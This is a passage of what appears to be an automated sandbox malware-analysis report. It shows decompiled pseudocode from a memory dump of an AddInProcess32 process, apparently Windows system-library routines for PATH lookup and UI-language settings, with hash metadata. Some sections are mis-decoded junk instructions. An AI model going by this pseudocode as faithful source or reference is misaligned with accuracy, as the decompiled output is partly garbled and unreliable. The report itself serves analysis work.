                              				signed int _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				intOrPtr _v60;
                              				signed int _v64;
                              				signed int _v68;
                              				signed int _v72;
                              				signed int _v76;
                              				signed int _v80;
                              				signed int _t240;
                              				signed int _t244;
                              				signed int _t245;
                              				signed int _t248;
                              				signed int _t250;
                              				intOrPtr _t252;
                              				signed int _t255;
                              				signed int _t262;
                              				signed int _t265;
                              				signed int _t273;
                              				signed int _t279;
                              				signed int _t281;
                              				void* _t283;
                              				signed int _t284;
                              				unsigned int _t287;
                              				signed int _t291;
                              				signed int* _t292;
                              				signed int _t293;
                              				signed int _t297;
                              				intOrPtr _t309;
                              				signed int _t318;
                              				signed int _t320;
                              				signed int _t321;
                              				signed int _t325;
                              				signed int _t326;
                              				signed int _t330;
                              				signed int _t332;
                              				signed int _t334;
                              				signed int _t335;
                              				signed int _t337;
                              
                              				_t332 = _t334;
                              				_t335 = _t334 - 0x4c;
                              				_v8 =  *0x194d360 ^ _t332;
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t325 = 0x194b2e8;
                              				_v56 = _a4;
                              				_v48 = __edx;
                              				_v60 = __ecx;
                              				_t287 = 0;
                              				_v80 = 0;
                              				asm("movsd");
                              				_v64 = 0;
                              				_v76 = 0;
                              				_v72 = 0;
                              				asm("movsd");
                              				_v44 = 0;
                              				_v52 = 0;
                              				_v68 = 0;
                              				asm("movsd");
                              				_v32 = 0;
                              				_v36 = 0;
                              				asm("movsd");
                              				_v16 = 0;
                              				_t279 = 0x48;
                              				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                              				_t318 = 0;
                              				_v37 = _t307;
                              				if(_v48 <= 0) {
                              					L16:
                              					_t45 = _t279 - 0x48; // 0x0
                              					__eflags = _t45 - 0xfffe;
                              					if(_t45 > 0xfffe) {
                              						_t326 = 0xc0000106;
                              						goto L32;
                              					} else {
                              						_t325 = L01874620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
                              						_v52 = _t325;
                              						__eflags = _t325;
                              						if(_t325 == 0) {
                              							_t326 = 0xc0000017;
                              							goto L32;
                              						} else {
                              							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
                              							_t50 = _t325 + 0x48; // 0x48
                              							_t320 = _t50;
                              							_t307 = _v32;
                              							 *(_t325 + 0x3c) = _t279;
                              							_t281 = 0;
                              							 *((short*)(_t325 + 0x30)) = _v48;
                              							__eflags = _t307;
                              							if(_t307 != 0) {
                              								 *(_t325 + 0x18) = _t320;
                              								__eflags = _t307 - 0x1948478;
                              								 *_t325 = ((0 | _t307 == 0x01948478) - 0x00000001 & 0xfffffffb) + 7;
                              								E0189F3E0(_t320,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
                              								_t307 = _v32;
                              								_t335 = _t335 + 0xc;
                              								_t281 = 1;
                              								__eflags = _a8;
                              								_t320 = _t320 + (( *_t307 & 0x0000ffff) >> 1) * 2;
                              								if(_a8 != 0) {
                              									_t273 = E018E39F2(_t320);
                              									_t307 = _v32;
                              									_t320 = _t273;
                              								}
                              							}
                              							_t291 = 0;
                              							_v16 = 0;
                              							__eflags = _v48;
                              							if(_v48 <= 0) {
                              								L31:
                              								_t326 = _v68;
                              								__eflags = 0;
                              								 *((short*)(_t320 - 2)) = 0;
                              								goto L32;
                              							} else {
                              								_t279 = _t325 + _t281 * 4;
                              								_v56 = _t279;
                              								do {
                              									__eflags = _t307;
                              									if(_t307 != 0) {
                              										_t240 =  *(_v60 + _t291 * 4);
                              										__eflags = _t240;
                              										if(_t240 == 0) {
                              											goto L30;
                              										} else {
                              											__eflags = _t240 == 5;
                              											if(_t240 == 5) {
                              												goto L30;
                              											} else {
                              												goto L22;
                              											}
                              										}
                              									} else {
                              										L22:
                              										 *_t279 =  *(_v60 + _t291 * 4);
                              										 *(_t279 + 0x18) = _t320;
                              										_t244 =  *(_v60 + _t291 * 4);
                              										__eflags = _t244 - 8;
                              										if(_t244 > 8) {
                              											goto L56;
                              										} else {
                              											switch( *((intOrPtr*)(_t244 * 4 +  &M01882959))) {
                              												case 0:
                              													__ax =  *0x1948488;
                              													__eflags = __ax;
                              													if(__ax == 0) {
                              														goto L29;
                              													} else {
                              														__ax & 0x0000ffff = E0189F3E0(__edi,  *0x194848c, __ax & 0x0000ffff);
                              														__eax =  *0x1948488 & 0x0000ffff;
                              														goto L26;
                              													}
                              													goto L108;
                              												case 1:
                              													L45:
                              													E0189F3E0(_t320, _v80, _v64);
                              													_t268 = _v64;
                              													goto L26;
                              												case 2:
                              													 *0x1948480 & 0x0000ffff = E0189F3E0(__edi,  *0x1948484,  *0x1948480 & 0x0000ffff);
                              													__eax =  *0x1948480 & 0x0000ffff;
                              													__eax = ( *0x1948480 & 0x0000ffff) >> 1;
                              													__edi = __edi + __eax * 2;
                              													goto L28;
                              												case 3:
                              													__eax = _v44;
                              													__eflags = __eax;
                              													if(__eax == 0) {
                              														goto L29;
                              													} else {
                              														__esi = __eax + __eax;
                              														__eax = E0189F3E0(__edi, _v72, __esi);
                              														__edi = __edi + __esi;
                              														__esi = _v52;
                              														goto L27;
                              													}
                              													goto L108;
                              												case 4:
                              													_push(0x2e);
                              													_pop(__eax);
                              													 *(__esi + 0x44) = __edi;
                              													 *__edi = __ax;
                              													__edi = __edi + 4;
                              													_push(0x3b);
                              													_pop(__eax);
                              													 *(__edi - 2) = __ax;
                              													goto L29;
                              												case 5:
                              													__eflags = _v36;
                              													if(_v36 == 0) {
                              														goto L45;
                              													} else {
                              														E0189F3E0(_t320, _v76, _v36);
                              														_t268 = _v36;
                              													}
                              													L26:
                              													_t335 = _t335 + 0xc;
                              													_t320 = _t320 + (_t268 >> 1) * 2 + 2;
                              													__eflags = _t320;
                              													L27:
                              													_push(0x3b);
                              													_pop(_t270);
                              													 *((short*)(_t320 - 2)) = _t270;
                              													goto L28;
                              												case 6:
                              													__ebx =  *0x194575c;
                              													__eflags = __ebx - 0x194575c;
                              													if(__ebx != 0x194575c) {
                              														_push(0x3b);
                              														_pop(__esi);
                              														do {
                              															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                              															E0189F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                              															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                              															__edi = __edi + __eax * 2;
                              															__edi = __edi + 2;
                              															 *(__edi - 2) = __si;
                              															__ebx =  *__ebx;
                              															__eflags = __ebx - 0x194575c;
                              														} while (__ebx != 0x194575c);
                              														__esi = _v52;
                              														__ecx = _v16;
                              														__edx = _v32;
                              													}
                              													__ebx = _v56;
                              													goto L29;
                              												case 7:
                              													 *0x1948478 & 0x0000ffff = E0189F3E0(__edi,  *0x194847c,  *0x1948478 & 0x0000ffff);
                              													__eax =  *0x1948478 & 0x0000ffff;
                              													__eax = ( *0x1948478 & 0x0000ffff) >> 1;
                              													__eflags = _a8;
                              													__edi = __edi + __eax * 2;
                              													if(_a8 != 0) {
                              														__ecx = __edi;
                              														__eax = E018E39F2(__ecx);
                              														__edi = __eax;
                              													}
                              													goto L28;
                              												case 8:
                              													__eax = 0;
                              													 *(__edi - 2) = __ax;
                              													 *0x1946e58 & 0x0000ffff = E0189F3E0(__edi,  *0x1946e5c,  *0x1946e58 & 0x0000ffff);
                              													 *(__esi + 0x38) = __edi;
                              													__eax =  *0x1946e58 & 0x0000ffff;
                              													__eax = ( *0x1946e58 & 0x0000ffff) >> 1;
                              													__edi = __edi + __eax * 2;
                              													__edi = __edi + 2;
                              													L28:
                              													_t291 = _v16;
                              													_t307 = _v32;
                              													L29:
                              													_t279 = _t279 + 4;
                              													__eflags = _t279;
                              													_v56 = _t279;
                              													goto L30;
                              											}
                              										}
                              									}
                              									goto L108;
                              									L30:
                              									_t291 = _t291 + 1;
                              									_v16 = _t291;
                              									__eflags = _t291 - _v48;
                              								} while (_t291 < _v48);
                              								goto L31;
                              							}
                              						}
                              					}
                              				} else {
                              					while(1) {
                              						L1:
                              						_t244 =  *(_v60 + _t318 * 4);
                              						if(_t244 > 8) {
                              							break;
                              						}
                              						switch( *((intOrPtr*)(_t244 * 4 +  &M01882935))) {
                              							case 0:
                              								__ax =  *0x1948488;
                              								__eflags = __ax;
                              								if(__ax != 0) {
                              									__eax = __ax & 0x0000ffff;
                              									__ebx = __ebx + 2;
                              									__eflags = __ebx;
                              									goto L53;
                              								}
                              								goto L14;
                              							case 1:
                              								L44:
                              								_t307 =  &_v64;
                              								_v80 = E01882E3E(0,  &_v64);
                              								_t279 = _t279 + _v64 + 2;
                              								goto L13;
                              							case 2:
                              								__eax =  *0x1948480 & 0x0000ffff;
                              								__ebx = __ebx + __eax;
                              								__eflags = __dl;
                              								if(__dl != 0) {
                              									__eax = 0x1948480;
                              									goto L80;
                              								}
                              								goto L14;
                              							case 3:
                              								__eax = E0186EEF0(0x19479a0);
                              								__eax =  &_v44;
                              								_push(__eax);
                              								_push(0);
                              								_push(0);
                              								_push(4);
                              								_push(L"PATH");
                              								_push(0);
                              								L57();
                              								__esi = __eax;
                              								_v68 = __esi;
                              								__eflags = __esi - 0xc0000023;
                              								if(__esi != 0xc0000023) {
                              									L10:
                              									__eax = E0186EB70(__ecx, 0x19479a0);
                              									__eflags = __esi - 0xc0000100;
                              									if(__esi == 0xc0000100) {
                              										_v44 = _v44 & 0x00000000;
                              										__eax = 0;
                              										_v68 = 0;
                              										goto L13;
                              									} else {
                              										__eflags = __esi;
                              										if(__esi < 0) {
                              											L32:
                              											_t218 = _v72;
                              											__eflags = _t218;
                              											if(_t218 != 0) {
                              												L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                              											}
                              											_t219 = _v52;
                              											__eflags = _t219;
                              											if(_t219 != 0) {
                              												__eflags = _t326;
                              												if(_t326 < 0) {
                              													L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
                              													_t219 = 0;
                              												}
                              											}
                              											goto L36;
                              										} else {
                              											__eax = _v44;
                              											__ebx = __ebx + __eax * 2;
                              											__ebx = __ebx + 2;
                              											__eflags = __ebx;
                              											L13:
                              											_t287 = _v36;
                              											goto L14;
                              										}
                              									}
                              								} else {
                              									__eax = _v44;
                              									__ecx =  *0x1947b9c; // 0x0
                              									_v44 + _v44 =  *[fs:0x30];
                              									__ecx = __ecx + 0x180000;
                              									__eax = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                              									_v72 = __eax;
                              									__eflags = __eax;
                              									if(__eax == 0) {
                              										__eax = E0186EB70(__ecx, 0x19479a0);
                              										__eax = _v52;
                              										L36:
                              										_pop(_t319);
                              										_pop(_t327);
                              										__eflags = _v8 ^ _t332;
                              										_pop(_t280);
                              										return E0189B640(_t219, _t280, _v8 ^ _t332, _t307, _t319, _t327);
                              									} else {
                              										__ecx =  &_v44;
                              										_push(__ecx);
                              										_push(_v44);
                              										_push(__eax);
                              										_push(4);
                              										_push(L"PATH");
                              										_push(0);
                              										L57();
                              										__esi = __eax;
                              										_v68 = __eax;
                              										goto L10;
                              									}
                              								}
                              								goto L108;
                              							case 4:
                              								__ebx = __ebx + 4;
                              								goto L14;
                              							case 5:
                              								_t275 = _v56;
                              								if(_v56 != 0) {
                              									_t307 =  &_v36;
                              									_t277 = E01882E3E(_t275,  &_v36);
                              									_t287 = _v36;
                              									_v76 = _t277;
                              								}
                              								if(_t287 == 0) {
                              									goto L44;
                              								} else {
                              									_t279 = _t279 + 2 + _t287;
                              								}
                              								goto L14;
                              							case 6:
                              								__eax =  *0x1945764 & 0x0000ffff;
                              								goto L53;
                              							case 7:
                              								__eax =  *0x1948478 & 0x0000ffff;
                              								__ebx = __ebx + __eax;
                              								__eflags = _a8;
                              								if(_a8 != 0) {
                              									__ebx = __ebx + 0x16;
                              									__ebx = __ebx + __eax;
                              								}
                              								__eflags = __dl;
                              								if(__dl != 0) {
                              									__eax = 0x1948478;
                              									L80:
                              									_v32 = __eax;
                              								}
                              								goto L14;
                              							case 8:
                              								__eax =  *0x1946e58 & 0x0000ffff;
                              								__eax = ( *0x1946e58 & 0x0000ffff) + 2;
                              								L53:
                              								__ebx = __ebx + __eax;
                              								L14:
                              								_t318 = _t318 + 1;
                              								if(_t318 >= _v48) {
                              									goto L16;
                              								} else {
                              									_t307 = _v37;
                              									goto L1;
                              								}
                              								goto L108;
                              						}
                              					}
                              					L56:
                              					_t292 = 0x25;
                              					asm("int 0x29");
                              					asm("out 0x28, al");
                              					 *_t292 = _t244;
                              					asm("o16 sub [eax-0x77d81fff], cl");
                              					 *_t325 =  *_t325 + _t332;
                              					 *[es:ecx] = _t244;
                              					_t328 = _t325 + 1;
                              					 *((intOrPtr*)(_t244 - 0x77d9faff)) =  *((intOrPtr*)(_t244 - 0x77d9faff)) - _t292;
                              					 *_t320 =  *_t320 + _t279;
                              					_pop(_t283);
                              					 *_t292 = es;
                              					_t245 = _t335;
                              					_t337 = _t244;
                              					 *((intOrPtr*)(_t245 - 0x73a4caff)) =  *((intOrPtr*)(_t245 - 0x73a4caff)) - _t292;
                              					 *_t307 =  *_t307 + _t245;
                              					 *((intOrPtr*)(_t245 - 0x77d77fff)) =  *((intOrPtr*)(_t245 - 0x77d77fff)) - _t292;
                              					_t329 = _t325 + 1 + _t328;
                              					asm("daa");
                              					 *_t292 = _t245;
                              					_push(ds);
                              					 *((intOrPtr*)(_t245 - 0x77d7b1ff)) =  *((intOrPtr*)(_t245 - 0x77d7b1ff)) - _t292;
                              					_a35 = _a35 + _t283;
                              					 *_t292 = _t245;
                              					asm("fcomp dword [ebx-0x74]");
                              					 *((intOrPtr*)(_t245 +  &_a1546912132)) =  *((intOrPtr*)(_t245 +  &_a1546912132)) + _t325 + 1 + _t328;
                              					 *_t292 = es;
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					_push(0x20);
                              					_push(0x192ff00);
                              					E018AD08C(_t283, _t320, _t329);
                              					_v44 =  *[fs:0x18];
                              					_t321 = 0;
                              					 *_a24 = 0;
                              					_t284 = _a12;
                              					__eflags = _t284;
                              					if(_t284 == 0) {
                              						_t248 = 0xc0000100;
                              					} else {
                              						_v8 = 0;
                              						_t330 = 0xc0000100;
                              						_v52 = 0xc0000100;
                              						_t250 = 4;
                              						while(1) {
                              							_v40 = _t250;
                              							__eflags = _t250;
                              							if(_t250 == 0) {
                              								break;
                              							}
                              							_t297 = _t250 * 0xc;
                              							_v48 = _t297;
                              							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x1831664));
                              							if(__eflags <= 0) {
                              								if(__eflags == 0) {
                              									_t265 = E0189E5C0(_a8,  *((intOrPtr*)(_t297 + 0x1831668)), _t284);
                              									_t337 = _t337 + 0xc;
                              									__eflags = _t265;
                              									if(__eflags == 0) {
                              										_t330 = E018D51BE(_t284,  *((intOrPtr*)(_v48 + 0x183166c)), _a16, _t321, _t330, __eflags, _a20, _a24);
                              										_v52 = _t330;
                              										break;
                              									} else {
                              										_t250 = _v40;
                              										goto L62;
                              									}
                              									goto L70;
                              								} else {
                              									L62:
                              									_t250 = _t250 - 1;
                              									continue;
                              								}
                              							}
                              							break;
                              						}
                              						_v32 = _t330;
                              						__eflags = _t330;
                              						if(_t330 < 0) {
                              							__eflags = _t330 - 0xc0000100;
                              							if(_t330 == 0xc0000100) {
                              								_t293 = _a4;
                              								__eflags = _t293;
                              								if(_t293 != 0) {
                              									_v36 = _t293;
                              									__eflags =  *_t293 - _t321;
                              									if( *_t293 == _t321) {
                              										_t330 = 0xc0000100;
                              										goto L76;
                              									} else {
                              										_t309 =  *((intOrPtr*)(_v44 + 0x30));
                              										_t252 =  *((intOrPtr*)(_t309 + 0x10));
                              										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t293;
                              										if( *((intOrPtr*)(_t252 + 0x48)) == _t293) {
                              											__eflags =  *(_t309 + 0x1c);
                              											if( *(_t309 + 0x1c) == 0) {
                              												L106:
                              												_t330 = E01882AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
                              												_v32 = _t330;
                              												__eflags = _t330 - 0xc0000100;
                              												if(_t330 != 0xc0000100) {
                              													goto L69;
                              												} else {
                              													_t321 = 1;
                              													_t293 = _v36;
                              													goto L75;
                              												}
                              											} else {
                              												_t255 = E01866600( *(_t309 + 0x1c));
                              												__eflags = _t255;
                              												if(_t255 != 0) {
                              													goto L106;
                              												} else {
                              													_t293 = _a4;
                              													goto L75;
                              												}
                              											}
                              										} else {
                              											L75:
                              											_t330 = E01882C50(_t293, _a8, _t284, _a16, _a20, _a24, _t321);
                              											L76:
                              											_v32 = _t330;
                              											goto L69;
                              										}
                              									}
                              									goto L108;
                              								} else {
                              									E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              									_v8 = 1;
                              									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                              									_t330 = _a24;
                              									_t262 = E01882AE4( &_v36, _a8, _t284, _a16, _a20, _t330);
                              									_v32 = _t262;
                              									__eflags = _t262 - 0xc0000100;
                              									if(_t262 == 0xc0000100) {
                              										_v32 = E01882C50(_v36, _a8, _t284, _a16, _a20, _t330, 1);
                              									}
                              									_v8 = _t321;
                              									E01882ACB();
                              								}
                              							}
                              						}
                              						L69:
                              						_v8 = 0xfffffffe;
                              						_t248 = _t330;
                              					}
                              					L70:
                              					return E018AD0D1(_t248);
                              				}
                              				L108:
                              			}

                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: PATH
                              • API String ID: 0-1036084923
                              • Opcode ID: 22182c37b7bf2a5e27d701b7d11a4d26bc2b7a1f97ff3aaf733eb46c622a0db4
                              • Instruction ID: 937ea351c3900cb50246f0b5d648c451027de6ee234e5206c280c02ebb3edca4
                              • Opcode Fuzzy Hash: 22182c37b7bf2a5e27d701b7d11a4d26bc2b7a1f97ff3aaf733eb46c622a0db4
                              • Instruction Fuzzy Hash: 08C17F75E00219EBDB25FF9DD880AADBBB6FF48754F484029E901EB250D734AA41CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 42%
                              			E0185C962(intOrPtr __ecx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t19;
                              				intOrPtr _t22;
                              				void* _t26;
                              				void* _t27;
                              				void* _t32;
                              				intOrPtr _t34;
                              				void* _t35;
                              				void* _t37;
                              				intOrPtr* _t38;
                              				signed int _t39;
                              
                              				_t41 = (_t39 & 0xfffffff8) - 0xc;
                              				_v8 =  *0x194d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                              				_t34 = __ecx;
                              				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                              					_t26 = 0;
                              					E0186EEF0(0x19470a0);
                              					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                              					if(E018DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                              						L9:
                              						E0186EB70(_t29, 0x19470a0);
                              						_t19 = _t26;
                              						L2:
                              						_pop(_t35);
                              						_pop(_t37);
                              						_pop(_t27);
                              						return E0189B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                              					}
                              					_t29 = _t34;
                              					_t26 = E018DF1FC(_t34, _t32);
                              					if(_t26 < 0) {
                              						goto L9;
                              					}
                              					_t38 =  *0x19470c0; // 0x0
                              					while(_t38 != 0x19470c0) {
                              						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                              						_t38 =  *_t38;
                              						_v12 = _t22;
                              						if(_t22 != 0) {
                              							_t29 = _t22;
                              							 *0x194b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                              							_v12();
                              						}
                              					}
                              					goto L9;
                              				}
                              				_t19 = 0;
                              				goto L2;
                              			}



















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7affd1e8e383e317cdde583c51ee448abf41c633b176586d7ca16cfa8bb3cfe4
                              • Instruction ID: 04953e33c3ac50fb1c563ef9c3a9c6cfb1a06d855909aa79e349e14aaf2683c4
                              • Opcode Fuzzy Hash: 7affd1e8e383e317cdde583c51ee448abf41c633b176586d7ca16cfa8bb3cfe4
                              • Instruction Fuzzy Hash: DB11C23530070B9BCB25AF6DDC8592AB7E5BB94B14B00052CE946C3651EB30EE10CBD2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E0188FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                              				char _v5;
                              				signed int _v8;
                              				signed int _v12;
                              				char _v16;
                              				char _v17;
                              				char _v20;
                              				signed int _v24;
                              				char _v28;
                              				char _v32;
                              				signed int _v40;
                              				void* __ecx;
                              				void* __edi;
                              				void* __ebp;
                              				signed int _t73;
                              				intOrPtr* _t75;
                              				signed int _t77;
                              				signed int _t79;
                              				signed int _t81;
                              				intOrPtr _t83;
                              				intOrPtr _t85;
                              				intOrPtr _t86;
                              				signed int _t91;
                              				signed int _t94;
                              				signed int _t95;
                              				signed int _t96;
                              				signed int _t106;
                              				signed int _t108;
                              				signed int _t114;
                              				signed int _t116;
                              				signed int _t118;
                              				signed int _t122;
                              				signed int _t123;
                              				void* _t129;
                              				signed int _t130;
                              				void* _t132;
                              				intOrPtr* _t134;
                              				signed int _t138;
                              				signed int _t141;
                              				signed int _t147;
                              				intOrPtr _t153;
                              				signed int _t154;
                              				signed int _t155;
                              				signed int _t170;
                              				void* _t174;
                              				signed int _t176;
                              				signed int _t177;
                              
                              				_t129 = __ebx;
                              				_push(_t132);
                              				_push(__esi);
                              				_t174 = _t132;
                              				_t73 =  !( *( *(_t174 + 0x18)));
                              				if(_t73 >= 0) {
                              					L5:
                              					return _t73;
                              				} else {
                              					E0186EEF0(0x1947b60);
                              					_t134 =  *0x1947b84; // 0x77997b80
                              					_t2 = _t174 + 0x24; // 0x24
                              					_t75 = _t2;
                              					if( *_t134 != 0x1947b80) {
                              						_push(3);
                              						asm("int 0x29");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						_push(0x1947b60);
                              						_t170 = _v8;
                              						_v28 = 0;
                              						_v40 = 0;
                              						_v24 = 0;
                              						_v17 = 0;
                              						_v32 = 0;
                              						__eflags = _t170 & 0xffff7cf2;
                              						if((_t170 & 0xffff7cf2) != 0) {
                              							L43:
                              							_t77 = 0xc000000d;
                              						} else {
                              							_t79 = _t170 & 0x0000000c;
                              							__eflags = _t79;
                              							if(_t79 != 0) {
                              								__eflags = _t79 - 0xc;
                              								if(_t79 == 0xc) {
                              									goto L43;
                              								} else {
                              									goto L9;
                              								}
                              							} else {
                              								_t170 = _t170 | 0x00000008;
                              								__eflags = _t170;
                              								L9:
                              								_t81 = _t170 & 0x00000300;
                              								__eflags = _t81 - 0x300;
                              								if(_t81 == 0x300) {
                              									goto L43;
                              								} else {
                              									_t138 = _t170 & 0x00000001;
                              									__eflags = _t138;
                              									_v24 = _t138;
                              									if(_t138 != 0) {
                              										__eflags = _t81;
                              										if(_t81 != 0) {
                              											goto L43;
                              										} else {
                              											goto L11;
                              										}
                              									} else {
                              										L11:
                              										_push(_t129);
                              										_t77 = E01866D90( &_v20);
                              										_t130 = _t77;
                              										__eflags = _t130;
                              										if(_t130 >= 0) {
                              											_push(_t174);
                              											__eflags = _t170 & 0x00000301;
                              											if((_t170 & 0x00000301) == 0) {
                              												_t176 = _a8;
                              												__eflags = _t176;
                              												if(__eflags == 0) {
                              													L64:
                              													_t83 =  *[fs:0x18];
                              													_t177 = 0;
                              													__eflags =  *(_t83 + 0xfb8);
                              													if( *(_t83 + 0xfb8) != 0) {
                              														E018676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                              													}
                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                              													goto L15;
                              												} else {
                              													asm("sbb edx, edx");
                              													_t114 = E018F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                              													__eflags = _t114;
                              													if(_t114 < 0) {
                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                              														E0185B150();
                              													}
                              													_t116 = E018F6D81(_t176,  &_v16);
                              													__eflags = _t116;
                              													if(_t116 >= 0) {
                              														__eflags = _v16 - 2;
                              														if(_v16 < 2) {
                              															L56:
                              															_t118 = E018675CE(_v20, 5, 0);
                              															__eflags = _t118;
                              															if(_t118 < 0) {
                              																L67:
                              																_t130 = 0xc0000017;
                              																goto L32;
                              															} else {
                              																__eflags = _v12;
                              																if(_v12 == 0) {
                              																	goto L67;
                              																} else {
                              																	_t153 =  *0x1948638; // 0x0
                              																	_t122 = L018638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                              																	_t154 = _v12;
                              																	_t130 = _t122;
                              																	__eflags = _t130;
                              																	if(_t130 >= 0) {
                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                              																		__eflags = _t123;
                              																		if(_t123 != 0) {
                              																			_t155 = _a12;
                              																			__eflags = _t155;
                              																			if(_t155 != 0) {
                              																				 *_t155 = _t123;
                              																			}
                              																			goto L64;
                              																		} else {
                              																			E018676E2(_t154);
                              																			goto L41;
                              																		}
                              																	} else {
                              																		E018676E2(_t154);
                              																		_t177 = 0;
                              																		goto L18;
                              																	}
                              																}
                              															}
                              														} else {
                              															__eflags =  *_t176;
                              															if( *_t176 != 0) {
                              																goto L56;
                              															} else {
                              																__eflags =  *(_t176 + 2);
                              																if( *(_t176 + 2) == 0) {
                              																	goto L64;
                              																} else {
                              																	goto L56;
                              																}
                              															}
                              														}
                              													} else {
                              														_t130 = 0xc000000d;
                              														goto L32;
                              													}
                              												}
                              												goto L35;
                              											} else {
                              												__eflags = _a8;
                              												if(_a8 != 0) {
                              													_t77 = 0xc000000d;
                              												} else {
                              													_v5 = 1;
                              													L0188FCE3(_v20, _t170);
                              													_t177 = 0;
                              													__eflags = 0;
                              													L15:
                              													_t85 =  *[fs:0x18];
                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                              														L18:
                              														__eflags = _t130;
                              														if(_t130 != 0) {
                              															goto L32;
                              														} else {
                              															__eflags = _v5 - _t130;
                              															if(_v5 == _t130) {
                              																goto L32;
                              															} else {
                              																_t86 =  *[fs:0x18];
                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                              																}
                              																__eflags = _t177;
                              																if(_t177 == 0) {
                              																	L31:
                              																	__eflags = 0;
                              																	L018670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                              																	goto L32;
                              																} else {
                              																	__eflags = _v24;
                              																	_t91 =  *(_t177 + 0x20);
                              																	if(_v24 != 0) {
                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                              																		goto L31;
                              																	} else {
                              																		_t141 = _t91 & 0x00000040;
                              																		__eflags = _t170 & 0x00000100;
                              																		if((_t170 & 0x00000100) == 0) {
                              																			__eflags = _t141;
                              																			if(_t141 == 0) {
                              																				L74:
                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                              																				goto L27;
                              																			} else {
                              																				_t177 = E0188FD22(_t177);
                              																				__eflags = _t177;
                              																				if(_t177 == 0) {
                              																					goto L42;
                              																				} else {
                              																					_t130 = E0188FD9B(_t177, 0, 4);
                              																					__eflags = _t130;
                              																					if(_t130 != 0) {
                              																						goto L42;
                              																					} else {
                              																						_t68 = _t177 + 0x20;
                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                              																						__eflags =  *_t68;
